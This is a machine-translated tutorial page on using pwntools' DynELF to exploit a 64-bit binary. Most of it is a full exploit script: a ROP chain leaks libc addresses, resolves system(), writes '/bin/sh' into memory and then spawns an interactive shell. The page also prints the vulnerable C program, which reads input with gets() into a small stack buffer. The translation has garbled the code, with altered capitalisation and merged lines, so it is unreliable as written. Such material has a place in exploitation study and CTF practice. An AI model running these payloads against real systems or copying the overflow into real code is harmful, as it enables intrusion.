Home > Others

Use of the Dynelf function in 64-bit lower Pwntools

Source: Internet
Author: User
Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more >

These days, some classmates asked me how to use this function under 64, so I wrote a method to use Dynelf.

Compiled program Http://pan.baidu.com/s/1jImF95O

The source is in the back

from PWN Import *elf = Elf ('./pwn_final ') Got_write = elf.got[' write ']print ' got_write= ' + hex (got_write) Call_get_name_fu NC = 0x400966print ' call_get_name_func= ' + hex (call_get_name_func) Got_read = elf.got[' read ']print "Got_read:" + Hex (got_ Read) Bss_addr = 0x6020c0pad = ' a ' p = Process ('./pwn_final ') Gdb.attach (p) #get system addressdef Leak (address): P.recvunt Il (' Please enter your name: ') payload1 = pad * Payload1 + = P64 (0x400d9a) + p64 (0) + P64 (1) + P64 (got_write) + P64 ( + P64 (address) + P64 (1) + P64 (0x400d80) Payload1 + = "\x00" *56 payload1 + = P64 (call_get_name_func) p.sendline (payload1) data = p.recv print "% #x + =%s"% (address, (data or "). Encode (' hex ')) return Datad = Dynelf ( Leak, Elf=elf ('./pwn_final ')) system_addr = D.lookup (' System ', ' libc ') print "system_addr=" + Hex (system_addr) #write System &&/bin/shpayload2 = "a" *56payload2 + = P64 (0x400d96) + p64 (0) +p64 (0) + P64 (1) + P64 (got_read) + P64 (+) + P (BSS_ADDR) + p64 (0) + P64 (0x400D80) Payload2 + = "\x00" *56payload2 + = P64 (call_get_name_func) p.sendline (payload2) p.send (P64 (SYSTEM_ADDR)) P.send ("/ Bin/sh\0 ") p.recvuntil (' Name: ') # Call systempayload3 =" a "*56payload3 + = P64 (0x400d96) + p64 (0) +p64 (0) + P64 (1) + P64 (bss_a DDR) + P64 (0) + p64 (0) + p64 (bss_addr+8) + p64 (0x400d80) payload3 + = "\x00" *56payload3 + = P64 (call_get_name_func) p.sendline (PAYLOAD3) p.interactive ()

Source code 

#include <stdio.h> #include <unistd.h> #include <stdlib.h> #include <string.h>void print_menu ( void Get_name (), void Add_paper (), void Delete_paper (), void Show_paper (), int get_num (), void Get_input (char *buffer,    int size, int no_should_fill_full); void Gg (); Char *link_list[10];int main () {setbuf (stdout, 0);    Setbuf (stdin, 0);    Setbuf (stderr, 0);    int choice;    Get_name ();        while (1) {print_menu ();        Choice = Get_num ();                Switch (choice) {case 1:add_paper ();            Break                Case 2:delete_paper ();            Break                Case 3:show_paper ();            Break        Default:return; }} printf ("Thank you!");}    int Get_num () {int result;    Char input[48];        Char *end_ptr;    Get_input (Input, 48, 1);    result = Strtol (input, &end_ptr, 0); if (input = = end_ptr) {printf ("%s input is not start with number!\ n ", input);    result = Get_num (); } return result;    void Get_input (char *buffer, int size, int no_should_fill_full) {int index = 0;    Char *current_location;    int current_input_size;        while (1) {current_location = Buffer+index;        Current_input_size = Fread (Buffer+index, 1, 1, stdin);        if (current_input_size <= 0) break; if (*current_location = = ' \ n ' && no_should_fill_full) {if (index) {*current_location = 0                ;            Return            }}else{index++;        if (index >= size) break;    }}}void Get_name () {char name[40];    printf ("Please enter your name:"); Gets (name);}    void Print_menu () {puts ("Welcome to use the improved paper Management system!");    Puts ("1 add paper");    Puts ("2 delete paper"); Puts ("3 show Paper");}    void Show_paper () {int index;    int length; printf ("Input the index of the paper want to SHow (0-9): ");    scanf ("%d", &index);    if (Index < 0 | | Index > 9) exit (1);    printf ("How long you'll enter:");    scanf ("%d", &length);    if (Length < 0 | | length > 2048) exit (1); Write (stdout, Link_list[index], length);}    void Add_paper () {int index;    int length;    printf ("Input the index you want to store (0-9):");    scanf ("%d", &index);    if (Index < 0 | | Index > 9) exit (1);    printf ("How long you'll enter:");    scanf ("%d", &length);    if (Length < 0 | | length > 2048) exit (1);    Link_list[index] = malloc (length);    if (link_list[index] = = NULL) exit (1);    printf ("Please enter your content:");    Gets (Link_list[index]); printf ("Add success!\n");}    void Delete_paper () {int index;    printf ("which paper want to delete,please enter it ' s index (0-9):");    scanf ("%d", &index);    if (Index < 0 | | Index > 9) exit (1);    Free (Link_list[index]); Puts ("Delete success!"));}    void Gg () {char name[40]; Read (stdin, name, 40);}

Use of the Dynelf function in 64-bit lower Pwntools

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

Related Keywords:
what use of isset function in php use of split function in java use of static function in c use of static function use of trim function use of function pwntools

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

What's Trending
Top 10 Tags
datastax versions naming convention zookeeper client class definition md5 microsoft sql server 2005 data structures exception handling error handling
Top 10 Keywords
microsoft download center down wordpress address url site address url wordpress address url windows installer 4 0 download 302 not found web address url definition site address url wordpress db2 integer mac os installation step by step pdf abbreviation for return

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

  • Sales Support

    1 on 1 presale consultation

    Chat Contact Sales

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

    Open a Ticket

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

    Learn More